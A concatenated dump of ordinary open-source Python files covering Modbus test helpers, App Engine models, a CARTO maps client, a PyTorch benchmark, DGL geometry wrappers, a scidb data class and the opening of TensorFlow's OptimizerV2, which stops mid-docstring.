tests/mb_util.py | vasilydenisenko/modbus_rtu_slave | 0 | 1170 | <reponame>vasilydenisenko/modbus_rtu_slave
# MIT License
# Copyright (c) 2021 <NAME>, <NAME>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import mb_bsp
PDU_SIZE_REG = 0
CONFIG_REG = 1
SLAVE_ADDR_REG = 2
CS_REG = 3
MB_MAX_WRITE_REGNUM = 123
MB_MAX_READ_REGNUM = 125
MB_MAX_REG_ADDR = 65535
MB_MAX_REG_VAL = 65535
MB_MAX_SLAVE_ADDR = 247
MB_MIN_SLAVE_ADDR = 1
MB_MAX_PDU_SIZE = 253
MB_MIN_PDU_SIZE = 1
FCODE_0x3 = 0x3
FCODE_0x6 = 0x6
FCODE_0x10 = 0x10
def incr_err_count():
incr_err_count.count += 1
setattr(incr_err_count, 'count', 0)
def wait_mb_master_status(status):
mb_bsp.wait_master_status(status) # 'FSM status' or 'PDU status'
if mb_bsp.alarm_cb.status_timeout == 1:
print('*** Test FAILED: ', status , ' timeout ***')
mb_bsp.alarm_cb.status_timeout = 0
incr_err_count()
def config_modbus(modbus_role, slave_addr, pdu, config_val):
wait_mb_master_status('FSM status')
if modbus_role == 'Master':
mb_bsp.write_mb_master_cs(CONFIG_REG, config_val) # Set configuration
mb_bsp.write_mb_master_cs(SLAVE_ADDR_REG, slave_addr) # Set slave address
mb_bsp.write_mb_master_cs(PDU_SIZE_REG, len(pdu)) # Set request PDU size
mb_bsp.write_mb_master_pdu(pdu) # Set request PDU
else:
mb_bsp.write_mb_slave_cs(CONFIG_REG, config_val) # Set configuration
mb_bsp.write_mb_slave_cs(SLAVE_ADDR_REG, slave_addr) # Set slave address
def generate_0x03_pdu(addr, regnum):
pdu = list()
ref_pdu = list()
pdu.append(0x3)
ref_pdu.append(0x3)
addr_h = (addr & 0xff00) >> 8
pdu.append(addr_h)
addr_l = (addr & 0xff)
pdu.append(addr_l)
regnum_h = (regnum & 0xff00) >> 8
pdu.append(regnum_h)
regnum_l = regnum & 0xff
pdu.append(regnum_l)
bytecount = regnum << 1
ref_pdu.append(bytecount)
for i in range(bytecount):
ref_pdu.append(0)
return [pdu, ref_pdu]
def generate_0x06_pdu(addr, regval):
pdu = list()
pdu.append(0x6)
addr_h = (addr & 0xff00) >> 8
pdu.append(addr_h)
addr_l = (addr & 0xff)
pdu.append(addr_l)
regval_h = (regval[0] & 0xff00) >> 8
pdu.append(regval_h)
regval_l = regval[0] & 0xff
pdu.append(regval_l)
ref_pdu = pdu.copy()
return [pdu, ref_pdu]
def generate_0x10_pdu(addr, regnum, regval):
pdu = list()
pdu.append(0x10)
addr_h = (addr & 0xff00) >> 8
pdu.append(addr_h)
addr_l = (addr & 0xff)
pdu.append(addr_l)
regnum_h = (regnum & 0xff00) >> 8
pdu.append(regnum_h)
regnum_l = regnum & 0xff
pdu.append(regnum_l)
ref_pdu = pdu.copy()
bytecount = regnum_l << 1
pdu.append(bytecount)
for i in range(regnum_l):
regval_h = (regval[i] & 0xff00) >> 8
pdu.append(regval_h)
regval_l = regval[i] & 0xff
pdu.append(regval_l)
return [pdu, ref_pdu]
def print_test_result(result_ok):
if result_ok:
msg = '\tTest Successful'
else:
msg = '\tTest FAILED'
print()
print('***************************')
print(msg)
print('***************************')
print()
def get_total_error_count(modbus_role):
count = 0
error_tuple = mb_bsp.get_error_count()
if modbus_role == 'Both':
for err_list in error_tuple:
for i in err_list:
count += i
elif modbus_role == 'Master':
for i in error_tuple[0]:
count += i
elif modbus_role == 'Slave':
for i in error_tuple[1]:
count += i
return count
def get_single_error_count(modbus_role, error_type):
error_tuple = mb_bsp.get_error_count()
count = 0
if modbus_role == 'Master':
if error_type == 'parity':
count = error_tuple[0][0]
elif error_type == 'start bit':
count = error_tuple[0][1]
elif error_type == 'stop bit':
count = error_tuple[0][2]
elif error_type == 'address':
count = error_tuple[0][3]
elif error_type == 'crc':
count = error_tuple[0][4]
elif modbus_role == 'Slave':
if error_type == 'parity':
count = error_tuple[1][0]
elif error_type == 'start bit':
count = error_tuple[1][1]
elif error_type == 'stop bit':
count = error_tuple[1][2]
elif error_type == 'address':
count = error_tuple[1][3]
elif error_type == 'crc':
count = error_tuple[1][4]
return count
def print_error_count():
error_tuple = mb_bsp.get_error_count()
print()
print('master_parity_err_count = ', error_tuple[0][0])
print('master_start_bit_err_count = ', error_tuple[0][1])
print('master_stop_bit_err_count = ', error_tuple[0][2])
print('master_addr_err_count = ', error_tuple[0][3])
print('master_crc_err_count = ', error_tuple[0][4])
print('slave_parity_err_count = ', error_tuple[1][0])
print('slave_start_bit_err_count = ', error_tuple[1][1])
print('slave_stop_bit_err_count = ', error_tuple[1][2])
print('slave_addr_err_count = ', error_tuple[1][3])
print('slave_crc_err_count = ', error_tuple[1][4])
print('--------------------------------')
print()
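# --- Illustrative self-check (not part of the original test utilities) ---
# Builds example request PDUs with the helpers above; the register address,
# count and values below are arbitrary demonstration numbers.
if __name__ == '__main__':
    req_0x03, ref_0x03 = generate_0x03_pdu(addr=0x0010, regnum=2)
    print('0x03 request PDU      :', [hex(b) for b in req_0x03])
    print('0x03 expected response:', [hex(b) for b in ref_0x03])
    req_0x10, ref_0x10 = generate_0x10_pdu(addr=0x0010, regnum=2, regval=[0x1234, 0xABCD])
    print('0x10 request PDU      :', [hex(b) for b in req_0x10])
    print('0x10 expected response:', [hex(b) for b in ref_0x10])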
| 1.96875 | 2 |
modules/stackoverflow/models.py | tjsavage/polymer-dashboard | 1 | 1171 | <gh_stars>1-10
import fix_path
import json
import datetime
from google.appengine.ext import ndb
# Taken from http://stackoverflow.com/questions/455580/json-datetime-between-python-and-javascript
dthandler = lambda obj: (
obj.isoformat()
if isinstance(obj, datetime.datetime)
or isinstance(obj, datetime.date)
else None
)
class StackOverflowSnapshot(ndb.Model):
"""Example Model"""
raw_timestamp = ndb.DateTimeProperty(required=True, auto_now_add=True)
requested_time = ndb.DateTimeProperty(required=True)
num_questions_by_tag = ndb.JsonProperty()
num_tagged_questions = ndb.IntegerProperty()
num_answered = ndb.IntegerProperty()
num_unanswered = ndb.IntegerProperty()
total_question_views = ndb.IntegerProperty()
status = ndb.StringProperty()
status_string = ndb.StringProperty()
def as_dict(self):
result = {}
result['requested_time'] = dthandler(self.requested_time)
result['num_tagged_questions'] = self.num_tagged_questions
result['num_questions_by_tag'] = self.num_questions_by_tag
result['num_answered'] = self.num_answered
result['num_unanswered'] = self.num_unanswered
result['total_question_views'] = self.total_question_views
result['status'] = self.status
result['status_string'] = self.status_string
return result
class StackOverflowQuestion(ndb.Model):
first_seen = ndb.DateTimeProperty(required=True, auto_now_add=True)
tags = ndb.StringProperty(repeated=True)
is_answered = ndb.BooleanProperty()
view_count = ndb.IntegerProperty()
answer_count = ndb.IntegerProperty()
url = ndb.StringProperty()
title = ndb.StringProperty()
creation_date = ndb.DateTimeProperty()
question_id = ndb.IntegerProperty()
def as_dict(self):
result = {}
result['first_seen'] = dthandler(self.first_seen)
result['tags'] = [t for t in self.tags]
result['is_answered'] = self.is_answered
result['view_count'] = self.view_count
result['answer_count'] = self.answer_count
result['url'] = self.url
result['title'] = self.title
result['creation_date'] = dthandler(self.creation_date)
result['question_id'] = self.question_id
return result
def update_to_stackexchange_question(self, stackexchange_question):
updated = False
if stackexchange_question.tags != self.tags:
self.tags = stackexchange_question.tags
updated = True
if stackexchange_question.json['is_answered'] != self.is_answered:
self.is_answered = stackexchange_question.json['is_answered']
updated = True
if stackexchange_question.view_count != self.view_count:
self.view_count = stackexchange_question.view_count
updated = True
if stackexchange_question.json['answer_count'] != self.answer_count:
self.answer_count = stackexchange_question.json['answer_count']
updated = True
if stackexchange_question.url != self.url:
self.url = stackexchange_question.url
updated = True
if stackexchange_question.title != self.title:
self.title = stackexchange_question.title
updated = True
if stackexchange_question.creation_date != self.creation_date:
self.creation_date = stackexchange_question.creation_date
updated = True
if stackexchange_question.json['question_id'] != self.question_id:
self.question_id = stackexchange_question.json['question_id']
updated = True
return updated
@classmethod
def from_stackexchange_question(cls, stackexchange_question):
result = cls(
tags = [t for t in stackexchange_question.tags],
is_answered = stackexchange_question.json['is_answered'],
view_count = stackexchange_question.view_count,
answer_count = stackexchange_question.json['answer_count'],
url = stackexchange_question.url,
title = stackexchange_question.title,
creation_date = stackexchange_question.creation_date,
question_id = stackexchange_question.json['question_id']
)
return result | 2.515625 | 3 |
src/main/java/com/bailei/study/beautyOfCoding/cpu50.py | sonymoon/algorithm | 0 | 1172 | #!/usr/bin/python3
# -*- coding: UTF-8 -*-
import time
# Busy-wait and sleep for equal time slices (milliseconds) so CPU usage hovers
# around 50%. time.clock() was removed in Python 3.8, so time.perf_counter()
# is used for the busy interval instead.
busyTime = 10
idleTime = busyTime
while True:
    start = time.perf_counter()
    while time.perf_counter() - start < busyTime / 1000:
        pass
    time.sleep(idleTime / 1000)
| 3.328125 | 3 |
carto/maps.py | danicarrion/carto-python | 85 | 1173 | """
Module for working with named and anonymous maps
.. module:: carto.maps
:platform: Unix, Windows
:synopsis: Module for working with named and anonymous maps
.. moduleauthor:: <NAME> <<EMAIL>>
.. moduleauthor:: <NAME> <<EMAIL>>
"""
try:
from urllib.parse import urljoin
except ImportError:
from urlparse import urljoin
from pyrestcli.resources import Manager, Resource
from .exceptions import CartoException, CartoRateLimitException
API_VERSION = "v1"
NAMED_API_ENDPOINT = "api/{api_version}/map/named/"
ANONYMOUS_API_ENDPOINT = "api/{api_version}/map/"
class BaseMap(Resource):
"""
Base class for NamedMap and AnonymousMap
"""
def __init__(self, auth_client):
"""
Initializes a BaseMap instance
:param auth_client: Auth client
"""
super(BaseMap, self).__init__(auth_client)
def get_tile_url(self, x, y, z, layer_id=None, feature_id=None,
filter=None, extension="png"):
"""
Prepares a URL to get data (raster or vector) from a NamedMap or
AnonymousMap
:param x: The x tile
:param y: The y tile
:param z: The zoom level
:param layer_id: Can be a number (referring to the # layer of your \
map), all layers of your map, or a list of layers.
To show just the basemap layer, enter the value 0
To show the first layer, enter the value 1
To show all layers, enter the value 'all'
To show a list of layers, enter the comma separated \
layer value as '0,1,2'
:param feature_id: The id of the feature
:param filter: The filter to be applied to the layer
:param extension: The format of the data to be retrieved: png, mvt, ...
:type x: int
:type y: int
:type z: int
:type layer_id: str
:type feature_id: str
:type filter: str
:type extension: str
:return: A URL to download data
:rtype: str
:raise: CartoException
"""
base_url = self.client.base_url + self.Meta.collection_endpoint
template_id = self.template_id if hasattr(self, 'template_id') \
else self.layergroupid
if layer_id is not None and feature_id is not None:
url = urljoin(base_url,
"{template_id}/{layer}/attributes/{feature_id}"). \
format(template_id=template_id,
layer=layer_id,
feature_id=feature_id)
elif layer_id is not None and filter is not None:
url = urljoin(base_url,
"{template_id}/{filter}/{z}/{x}/{y}.{extension}"). \
format(template_id=template_id,
filter=filter,
z=z, x=x, y=y,
extension=extension)
elif layer_id is not None:
url = urljoin(base_url,
"{template_id}/{layer}/{z}/{x}/{y}.{extension}"). \
format(template_id=template_id,
layer=layer_id,
z=z, x=x, y=y,
extension=extension)
else:
url = urljoin(base_url, "{template_id}/{z}/{x}/{y}.{extension}"). \
format(
template_id=template_id,
z=z, x=x, y=y,
extension=extension)
if hasattr(self, 'auth') and self.auth is not None \
and len(self.auth['valid_tokens']) > 0:
url = urljoin(url, "?auth_token={auth_token}"). \
format(auth_token=self.auth['valid_tokens'][0])
return url
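# Illustrative sketch (not part of the original module): get_tile_url only
# assembles a URL string from an already-instantiated named or anonymous map;
# it performs no HTTP request. The tile coordinates below are arbitrary.
def _example_tile_url(instantiated_map):
    return instantiated_map.get_tile_url(x=301, y=985, z=11,
                                         layer_id=1, extension="png")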
class NamedMap(BaseMap):
"""
Equivalent to creating a named map in CARTO.
"""
class Meta:
collection_endpoint = NAMED_API_ENDPOINT.format(
api_version=API_VERSION)
id_field = "template_id"
name_field = "name"
    def __str__(self):
        try:
            return unicode(self.name).encode("utf-8")
        except (AttributeError, NameError):
            # Python 3 has no `unicode` builtin; fall back to the default repr.
            return super(NamedMap, self).__repr__()
def __init__(self, auth_client):
"""
Initializes a NamedMap instance
:param auth_client: Auth client
"""
self.fields = ["version",
"name",
"auth",
"placeholders",
"layergroup",
"view"]
# Optional fields can be assigned by some responses create, instantiate,
# but are not saved to the backend
self.optional_fields = ["template_id", "layergroupid", "last_updated"]
super(NamedMap, self).__init__(auth_client)
def instantiate(self, params, auth=None):
"""
Allows you to fetch the map tiles of a created map
:param params: The json with the styling info for the named map
:param auth: The auth client
:type params: dict
:type auth: :class:`carto.auth.APIKeyAuthClient`
:return:
:raise: CartoException
"""
try:
endpoint = (self.Meta.collection_endpoint
+ "{template_id}"). \
format(template_id=self.template_id)
if (auth is not None):
endpoint = (endpoint + "?auth_token={auth_token}"). \
format(auth_token=auth)
self.send(endpoint, "POST", json=params)
except CartoRateLimitException as e:
raise e
except Exception as e:
raise CartoException(e)
def update_from_dict(self, attribute_dict):
"""
Method overriden from the base class
"""
if 'template' in attribute_dict:
self.update_from_dict(attribute_dict['template'])
setattr(self,
self.Meta.id_field, attribute_dict['template']['name'])
return
try:
for k, v in attribute_dict.items():
if k in self.fields + self.optional_fields:
setattr(self, k, v)
except Exception:
setattr(self, self.Meta.id_field, attribute_dict)
class AnonymousMap(BaseMap):
"""
Equivalent to creating an anonymous map in CARTO.
"""
class Meta:
collection_endpoint = ANONYMOUS_API_ENDPOINT.format(
api_version=API_VERSION)
def __init__(self, auth_client):
"""
Initializes an AnonymousMap instance
:param auth_client: Auth client
"""
self.optional_fields = ['cdn_url', 'last_updated', 'layergroupid', 'metadata']
super(AnonymousMap, self).__init__(auth_client)
def instantiate(self, params):
"""
Allows you to fetch the map tiles of a created map
:param params: The json with the styling info for the named map
:type params: dict
:return:
:raise: CartoException
"""
try:
self.send(self.Meta.collection_endpoint, "POST", json=params)
except CartoRateLimitException as e:
raise e
except Exception as e:
raise CartoException(e)
def update_from_dict(self, attribute_dict):
for k, v in attribute_dict.items():
if k in self.fields + self.optional_fields:
setattr(self, k, v)
class NamedMapManager(Manager):
"""
Manager for the NamedMap class
"""
resource_class = NamedMap
json_collection_attribute = "template_ids"
def create(self, **kwargs):
"""
Creates a named map
:param kwargs: Attributes for creating the named map. Specifically
an attribute `template` must contain the JSON object
defining the named map
:type kwargs: kwargs
:return: New named map object
:rtype: NamedMap
:raise: CartoException
"""
resource = self.resource_class(self.client)
resource.update_from_dict(kwargs['template'])
resource.save(force_create=True)
return resource
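# Illustrative sketch (not part of the original module; the template values
# below are placeholders, not a complete Maps API template): creating a named
# map through the manager given an already authenticated client.
def _example_create_named_map(auth_client):
    manager = NamedMapManager(auth_client)
    return manager.create(template={
        "version": "0.0.1",
        "name": "example_template",
        "auth": {"method": "open"},
        "placeholders": {},
        "layergroup": {"layers": []},
        "view": {}
    })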
| 3.140625 | 3 |
client_driver.py | tlagore/kv_store | 0 | 1174 | from kv_client.kv_client import KVClient
def main():
kvSlave = KVClient(1, "127.0.0.1", 3456)
kvSlave.start()
if __name__ == "__main__":
main() | 1.390625 | 1 |
pytorch-frontend/benchmarks/operator_benchmark/pt/embeddingbag_test.py | AndreasKaratzas/stonne | 206 | 1175 | <reponame>AndreasKaratzas/stonne<filename>pytorch-frontend/benchmarks/operator_benchmark/pt/embeddingbag_test.py
import operator_benchmark as op_bench
import torch
import numpy
from . import configs
"""EmbeddingBag Operator Benchmark"""
class EmbeddingBagBenchmark(op_bench.TorchBenchmarkBase):
def init(self, embeddingbags, dim, mode, input_size, offset, sparse, include_last_offset, device):
self.embedding = torch.nn.EmbeddingBag(
num_embeddings=embeddingbags,
embedding_dim=dim,
mode=mode,
include_last_offset=include_last_offset,
sparse=sparse).to(device=device)
numpy.random.seed((1 << 32) - 1)
self.input = torch.tensor(numpy.random.randint(0, embeddingbags, input_size), device=device).long()
offsets = torch.LongTensor([offset], device=device)
self.offset = torch.cat((offsets, torch.tensor([self.input.size(0)], dtype=torch.long)), 0)
self.set_module_name('embeddingbag')
def forward(self):
return self.embedding(self.input, self.offset)
op_bench.generate_pt_test(configs.embeddingbag_short_configs, EmbeddingBagBenchmark)
op_bench.generate_pt_gradient_test(configs.embeddingbag_short_configs, EmbeddingBagBenchmark)
if __name__ == "__main__":
op_bench.benchmark_runner.main()
| 2.1875 | 2 |
python/dgl/geometry/capi.py | lfchener/dgl | 9,516 | 1176 | """Python interfaces to DGL farthest point sampler."""
from dgl._ffi.base import DGLError
import numpy as np
from .._ffi.function import _init_api
from .. import backend as F
from .. import ndarray as nd
def _farthest_point_sampler(data, batch_size, sample_points, dist, start_idx, result):
r"""Farthest Point Sampler
Parameters
----------
data : tensor
A tensor of shape (N, d) where N is the number of points and d is the dimension.
batch_size : int
The number of batches in the ``data``. N should be divisible by batch_size.
sample_points : int
The number of points to sample in each batch.
dist : tensor
Pre-allocated tensor of shape (N, ) for to-sample distance.
start_idx : tensor of int
Pre-allocated tensor of shape (batch_size, ) for the starting sample in each batch.
result : tensor of int
Pre-allocated tensor of shape (sample_points * batch_size, ) for the sampled index.
Returns
-------
    No return value. The input variable ``result`` will be overwritten with sampled indices.
"""
assert F.shape(data)[0] >= sample_points * batch_size
assert F.shape(data)[0] % batch_size == 0
_CAPI_FarthestPointSampler(F.zerocopy_to_dgl_ndarray(data),
batch_size, sample_points,
F.zerocopy_to_dgl_ndarray(dist),
F.zerocopy_to_dgl_ndarray(start_idx),
F.zerocopy_to_dgl_ndarray(result))
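# Illustrative sketch (assumes the PyTorch backend): a minimal driver for the
# sampler above, allocating the buffers with the shapes the docstring requires.
def _example_farthest_point_sampler():
    import torch
    batch_size, npoints, sample_points, dim = 2, 8, 3, 3
    data = torch.rand(batch_size * npoints, dim)
    dist = torch.zeros(batch_size * npoints)
    start_idx = torch.zeros(batch_size, dtype=torch.long)
    result = torch.zeros(sample_points * batch_size, dtype=torch.long)
    _farthest_point_sampler(data, batch_size, sample_points, dist, start_idx,
                            result)
    return result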
def _neighbor_matching(graph_idx, num_nodes, edge_weights=None, relabel_idx=True):
"""
Description
-----------
The neighbor matching procedure of edge coarsening used in
`Metis <http://cacs.usc.edu/education/cs653/Karypis-METIS-SIAMJSC98.pdf>`__
and
`Graclus <https://www.cs.utexas.edu/users/inderjit/public_papers/multilevel_pami.pdf>`__
for homogeneous graph coarsening. This procedure keeps picking an unmarked
    vertex and matching it with one of its unmarked neighbors (that maximizes its
edge weight) until no match can be done.
If no edge weight is given, this procedure will randomly pick neighbor for each
vertex.
The GPU implementation is based on `A GPU Algorithm for Greedy Graph Matching
<http://www.staff.science.uu.nl/~bisse101/Articles/match12.pdf>`__
    NOTE: The input graph must be a bi-directed (undirected) graph. Call :obj:`dgl.to_bidirected`
if you are not sure your graph is bi-directed.
Parameters
----------
graph : HeteroGraphIndex
The input homogeneous graph.
num_nodes : int
The number of nodes in this homogeneous graph.
    edge_weights : tensor, optional
The edge weight tensor holding non-negative scalar weight for each edge.
default: :obj:`None`
relabel_idx : bool, optional
If true, relabel resulting node labels to have consecutive node ids.
default: :obj:`True`
Returns
-------
a 1-D tensor
A vector with each element that indicates the cluster ID of a vertex.
"""
edge_weight_capi = nd.NULL["int64"]
if edge_weights is not None:
edge_weight_capi = F.zerocopy_to_dgl_ndarray(edge_weights)
node_label = F.full_1d(
num_nodes, -1, getattr(F, graph_idx.dtype), F.to_backend_ctx(graph_idx.ctx))
node_label_capi = F.zerocopy_to_dgl_ndarray_for_write(node_label)
_CAPI_NeighborMatching(graph_idx, edge_weight_capi, node_label_capi)
if F.reduce_sum(node_label < 0).item() != 0:
raise DGLError("Find unmatched node")
# reorder node id
# TODO: actually we can add `return_inverse` option for `unique`
# function in backend for efficiency.
if relabel_idx:
node_label_np = F.zerocopy_to_numpy(node_label)
_, node_label_np = np.unique(node_label_np, return_inverse=True)
return F.tensor(node_label_np)
else:
return node_label
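# Illustrative sketch (assumes the PyTorch backend; accessing g._graph for the
# low-level HeteroGraphIndex is an assumption about DGL internals): matching on
# a small bi-directed cycle graph.
def _example_neighbor_matching():
    import dgl
    import torch
    src = torch.tensor([0, 1, 1, 2, 2, 3, 3, 0])
    dst = torch.tensor([1, 0, 2, 1, 3, 2, 0, 3])
    g = dgl.graph((src, dst))  # every edge present in both directions
    return _neighbor_matching(g._graph, g.num_nodes())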
_init_api('dgl.geometry', __name__)
| 2.203125 | 2 |
scidb/core/data.py | oxdc/sci.db | 0 | 1177 | import shutil
import hashlib
from pathlib import Path
from typing import TextIO, BinaryIO, IO, Union
from datetime import datetime
from os.path import getmtime
from .low import ObservableDict
class Data:
def __init__(self, data_name: str, parent, bucket,
protected_parent_methods: Union[None, dict] = None):
self.__data_name__ = data_name
self.__parent__ = parent
self.__bucket__ = bucket
self.__protected_parent_methods__ = protected_parent_methods
self.__protected_parent_methods__['increase_data_count']()
self.init_metadata()
self.init_properties()
@property
def database(self):
return self.__bucket__.db
@property
def db(self):
return self.__bucket__.db
@property
def bucket(self):
return self.__bucket__
def init_metadata(self):
if self.__data_name__ not in self.__parent__.metadata:
self.__parent__.metadata[self.__data_name__] = dict()
def init_properties(self):
if self.__data_name__ not in self.__parent__.properties:
self.__parent__.properties[self.__data_name__] = dict()
def set_metadata(self, metadata: Union[None, dict], merge: bool = True):
if metadata is None:
return
if merge:
metadata = {**self.metadata, **metadata}
self.__parent__.metadata[self.__data_name__] = metadata
def set_properties(self, properties: Union[None, dict], merge: bool = True):
if properties is None:
return
if merge:
properties = {**self.properties, **properties}
self.__parent__.properties[self.__data_name__] = properties
@property
def parent(self):
return self.__parent__
@property
def path(self) -> Path:
return self.__parent__.path / self.__data_name__
@property
def name(self) -> str:
return self.__data_name__
@property
def metadata(self) -> ObservableDict:
return self.__parent__.metadata[self.__data_name__]
@property
def properties(self) -> ObservableDict:
return self.__parent__.properties[self.__data_name__]
def rename(self, new_name: str):
shutil.move(str(self.path), str(self.__parent__.path / new_name))
self.__data_name__ = new_name
def reader(self, binary: bool = False, **kwargs) -> [IO, BinaryIO, TextIO, None]:
mode = 'r'
mode += 'b' if binary else ''
return open(str(self.path), mode=mode, **kwargs)
def creator(self,
binary: bool = False,
confirm: bool = False,
feedback: bool = False,
**kwargs) -> [IO, BinaryIO, TextIO, None]:
if confirm and not feedback:
return None
mode = 'x'
mode += 'b' if binary else ''
return open(str(self.path), mode=mode, **kwargs)
def writer(self,
binary: bool = False,
append: bool = True,
allow_overwrite: bool = False,
confirm: bool = True,
feedback: bool = False,
**kwargs) -> [IO, BinaryIO, TextIO, None]:
if not allow_overwrite and not append:
raise PermissionError('Trying to overwrite existed data.')
if confirm and not feedback:
return
mode = 'a' if append else 'w'
mode += 'b' if binary else ''
return open(str(self.path), mode=mode, **kwargs)
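    # Illustrative note (not part of the original module): confirm/feedback act
    # as an explicit opt-in, so writer() returns None unless the caller passes
    # feedback=True. A typical append might look like:
    #
    #   handle = data.writer(append=True, confirm=True, feedback=True)
    #   if handle is not None:
    #       with handle:
    #           handle.write('new line\n')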
def __repr__(self):
return f"Data('{self.__data_name__}')"
def import_file(self, src_path: [str, Path], allow_overwrite=False, confirm=True, feedback=False):
if self.path.exists() and not allow_overwrite:
return
if confirm and not feedback:
return
shutil.copyfile(str(src_path), str(self.path))
def export_file(self, dst_path: [str, Path], allow_overwrite=False):
if Path(dst_path).exists() and not allow_overwrite:
return
shutil.copyfile(str(self.path), str(dst_path))
def __calc_hash__(self, h, buffer_size: int = 131072):
if not self.path.exists():
return None
with open(str(self.path), 'rb') as file_reader:
while True:
data = file_reader.read(buffer_size)
if not data:
break
h.update(data)
return h.hexdigest()
def md5(self, buffer_size: int = 131072, require_update: bool = False) -> [str, None]:
if not self.path.exists():
return None
last_modified_time = getmtime(str(self.path))
if require_update \
or 'md5' not in self.metadata \
or 'md5-timestamp' not in self.metadata \
or self.metadata['md5-timestamp'] < last_modified_time:
result = self.__calc_hash__(hashlib.md5(), buffer_size)
self.metadata['md5'] = result
self.metadata['md5-timestamp'] = datetime.now().timestamp()
return result
else:
return self.metadata['md5']
def sha1(self, buffer_size: int = 131072, require_update: bool = False) -> [str, None]:
if not self.path.exists():
return None
last_modified_time = getmtime(str(self.path))
if require_update \
or 'sha1' not in self.metadata \
or 'sha1-timestamp' not in self.metadata \
or self.metadata['sha1-timestamp'] < last_modified_time:
result = self.__calc_hash__(hashlib.sha1(), buffer_size)
self.metadata['sha1'] = result
self.metadata['sha1-timestamp'] = datetime.now().timestamp()
return result
else:
return self.metadata['sha1']
def sha256(self, buffer_size: int = 131072, require_update: bool = False) -> [str, None]:
if not self.path.exists():
return None
last_modified_time = getmtime(str(self.path))
if require_update \
or 'sha256' not in self.metadata \
or 'sha256-timestamp' not in self.metadata \
or self.metadata['sha256-timestamp'] < last_modified_time:
result = self.__calc_hash__(hashlib.sha256(), buffer_size)
self.metadata['sha256'] = result
self.metadata['sha256-timestamp'] = datetime.now().timestamp()
return result
else:
return self.metadata['sha256']
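# Illustrative sketch (not part of the original module): the checksum helpers
# cache their result in the data's metadata together with a timestamp, so a
# repeated call on an unmodified file is served from metadata instead of
# re-reading the file.
def _example_checksums(data_obj):
    first = data_obj.sha256()                      # hashes the file, caches result
    cached = data_obj.sha256()                     # answered from metadata
    forced = data_obj.sha256(require_update=True)  # re-hash regardless of cache
    return first == cached == forced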
| 2.328125 | 2 |
tensorflow/python/keras/optimizer_v2/optimizer_v2.py | PaulWang1905/tensorflow | 9 | 1178 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Version 2 of class Optimizer."""
# pylint: disable=g-bad-name
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import functools
import six
from tensorflow.python.distribute import distribution_strategy_context as distribute_ctx
from tensorflow.python.distribute import reduce_util as ds_reduce_util
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.keras import backend
from tensorflow.python.keras import initializers
from tensorflow.python.keras.engine import base_layer_utils
from tensorflow.python.keras.optimizer_v2 import learning_rate_schedule
from tensorflow.python.keras.utils import tf_utils
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import gradients
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables as tf_variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import revived_types
from tensorflow.python.training.tracking import base as trackable
from tensorflow.python.util import nest
from tensorflow.python.util.tf_export import keras_export
def _deduplicate_indexed_slices(values, indices):
"""Sums `values` associated with any non-unique `indices`.
Args:
values: A `Tensor` with rank >= 1.
indices: A one-dimensional integer `Tensor`, indexing into the first
dimension of `values` (as in an IndexedSlices object).
Returns:
A tuple of (`summed_values`, `unique_indices`) where `unique_indices` is a
de-duplicated version of `indices` and `summed_values` contains the sum of
`values` slices associated with each unique index.
"""
unique_indices, new_index_positions = array_ops.unique(indices)
summed_values = math_ops.unsorted_segment_sum(
values, new_index_positions,
array_ops.shape(unique_indices)[0])
return (summed_values, unique_indices)
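# Illustrative worked example (not part of the original source): with
# values=[[1.], [2.], [3.]] and indices=[0, 2, 0], the two rows sharing index 0
# are summed, giving summed_values=[[4.], [2.]] and unique_indices=[0, 2].
def _example_deduplicate_indexed_slices():
  values = ops.convert_to_tensor([[1.], [2.], [3.]])
  indices = ops.convert_to_tensor([0, 2, 0])
  return _deduplicate_indexed_slices(values, indices)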
@six.add_metaclass(abc.ABCMeta)
@keras_export("keras.optimizers.Optimizer")
class OptimizerV2(trackable.Trackable):
"""Updated base class for optimizers.
This class defines the API to add Ops to train a model. You never use this
class directly, but instead instantiate one of its subclasses such as
`tf.keras.optimizers.SGD`, `tf.keras.optimizers.Adam`.
### Usage
```python
# Create an optimizer with the desired parameters.
opt = tf.keras.optimizers.SGD(learning_rate=0.1)
# `loss` is a callable that takes no argument and returns the value
# to minimize.
loss = lambda: 3 * var1 * var1 + 2 * var2 * var2
# In graph mode, returns op that minimizes the loss by updating the listed
# variables.
opt_op = opt.minimize(loss, var_list=[var1, var2])
opt_op.run()
# In eager mode, simply call minimize to update the list of variables.
opt.minimize(loss, var_list=[var1, var2])
```
### Custom training loop with Keras models
In Keras models, sometimes variables are created when the model is first
called, instead of construction time. Examples include 1) sequential models
without input shape pre-defined, or 2) subclassed models. Pass var_list as
callable in these cases.
Example:
```python
opt = tf.keras.optimizers.SGD(learning_rate=0.1)
